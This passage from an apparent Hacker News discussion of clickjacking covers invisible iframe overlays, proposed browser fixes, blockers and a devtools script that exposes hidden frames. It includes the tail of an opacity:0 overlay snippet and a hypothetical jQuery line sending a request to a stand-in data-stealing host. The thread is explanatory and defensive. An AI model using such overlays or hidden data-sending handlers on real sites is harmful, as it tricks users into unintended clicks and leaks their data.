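               opacity:0;   /* invisible, but still on top and clickable */
               z-index:2;">
</iframe>
```

The victim sees and aims for the decoy, but the click lands in the framed page. So the framed site is the one under attack, not the page doing the embedding.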

Why aren't events masked by the last several frames generated by the rendering system?

If a page is divided into two columns with the left half originating from the source origin and the right half from a delegated origin, why should the source origin observe interaction events from the right half, or vice versa?

We should be able to press a hotkey and immediately see at-a-glance who is operating what.

Yeah, that took me a while to figure out just now. But I still don't see how that's an issue, I'm browsing on ycombinator.com, not ashittyiframesite.com

I'd like to see the browser vendors move to allow the source page to carve out and delegate rendering a single region of pixels per child frame -- preventing other frames, including the source page, rendering into that region or receiving events originating in that region. Finally, child frames should not be allowed to sub-partition their allocation -- there's no defensible need for this except clickjacking.

This would neatly solve this problem with the low cost of making folks who want to implement modal popovers have to do some proper scene management in their pages.

It should always be possible for the end-user to view a colored overlay of their screen and see exactly which origins are operating which regions of the screen.
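A crude version of that overlay can be hacked together today from the devtools console. Pasting this outlines every iframe and forces it visible (inline `!important` declarations can be replaced from here, unlike from a user stylesheet):

```html
<script>
  // Outline every iframe and label it with its origin, even if the page
  // styled it invisible:
  for (const f of document.querySelectorAll('iframe')) {
    f.style.setProperty('display', 'block', 'important');
    f.style.setProperty('opacity', '1', 'important');
    f.style.setProperty('outline', '3px solid red', 'important');
    f.title = f.src ? new URL(f.src, location.href).origin : '(no src)';
  }
</script>
```

Hovering a frame then shows its origin as a tooltip. A proper browser feature could obviously do much better.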

> to allow the source page to carve out

How would that help? If I have malicious site, I just wouldn't use that feature.

This is why I use Firefox Containers.

I do know that the Google AdSense audit bot specifically checks for their banners being obscured.

With uMatrix the iframes come out nicely too. I was never happy with NoScript's usability, so I didn't use any additional script blocking until I figured out how easy uMatrix is to use.


Am I safe from this exploit if I disable Javascript?

You may be protected from the specific examples provided in the blog post, but, on the whole, you will not be protected. Most of the underlying vulnerabilities here can be exploited with simple HTML and CSS.

Content blockers can also prevent embedded iframes from loading. The article looks like this for me using uMatrix in Firefox: https://i.imgur.com/pYFXRR3.png

Clicking the link opens the iframe in a new tab, so it's hard to click it again without noticing what's going on.

You can make it a bit more visible if you use the Stylus extension.

Unfortunately Chrome (and probably Firefox Quantum) doesn't let you apply CSS agent_sheets (only user/author), so that style="display:none!important" on the iframes can't be overridden.

If you use older Firefox or Palemoon then you can use Stylish v2.0.7 and override it.

  iframe{border:1px solid red!important;display:block!important}

Facebook attempts to prevent “likejacking” by sometimes asking the user to verify they intended to really like that page. If they see that most people do not confirm this then they ban your like button/page.

So taking facebook’s example this can be “prevented” through some random verification.

I'm perhaps not understanding the significance of this. Is the issue that if you go to a shitty scam site and start clicking things you might have issues?? I don't see how that's an issue to be solved by a browser.

Leaking your image and email is a huge issue though.

Does using different browser "profiles" while never signing into other sites help with this?

Yes, if you aren't signed in to other accounts most of these click jacking scenarios would need to convince you to sign in which would be pretty obvious.

>There's no reliable way to prevent Clickjacking

just turn off js >_>

Clickjacking works without JavaScript assuming the targeted site works without JavaScript. HTML and CSS suffice.

I want to believe you, but the only example I found doesn't work.

So now no one can use this service, because I am getting the warning message "The client origin is not permitted to use this API." even though I added API restrictions...

For dismissing questionable stuff in the browser which I’d rather not click, I prefer doing it from within dev tools, using a pinch of CSS.

Remember "Don't be evil"? Security bug, won't fix; block the demo to decrease awareness of the security hole. That's evil.

What does the ??? button do?

Nothing. Here's its code:

  <span class="fake-button" style="padding: 0px 6px;">???</span>

That means nothing. You could still do:

  <script>$('.fake-button').on('click', function(){$.ajax({url: 'http://www.steal-your-data.fake'})})</script>

The inspector displays the listeners of the elements.

Sure about that? ;)

Why doesn't the browser simply disable cookies for the iframe?

That would break lots of things that rely on this...

Are elinks users safe?

elinks isn't safe, full stop.

A failure to verify SSL certificates has plagued elinks since 2012 [0]. Some versions verify correctly, but the bug keeps coming back.

[0] https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=694658

404 Footnote Not Found

... Thanks. Apologies, I'm having arguments with my assisted keyboard.

Are elinks users safe from AFL? If you are not running elinks in at least a container, you are asking for pwnage.

What's AFL?

Oh, I know this AFL. But it didn't make sense in the context of your question, so I assumed you meant something else.

What do you mean by being "safe from AFL"?

Well, elinks is a cul-de-sac, and AFL would probably obliterate it, so elinks users are most probably putting themselves in more danger than they're avoiding.

elinks doesn't render iframes, so this attack wouldn't work.


Of all the content in this article, "modern browser" is what you latch on to? The author isn't shaming you for your choice of browser, or telling you what you should be using for day-to-day browsing.

"Modern browser" means a browser that keeps up with modern web standards. Yes, w3m (for instance) still receives updates, but (going by the changelog) those updates refine how the browser handles very old web standards rather than extends support to new ones.

Thanks for sharing!

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact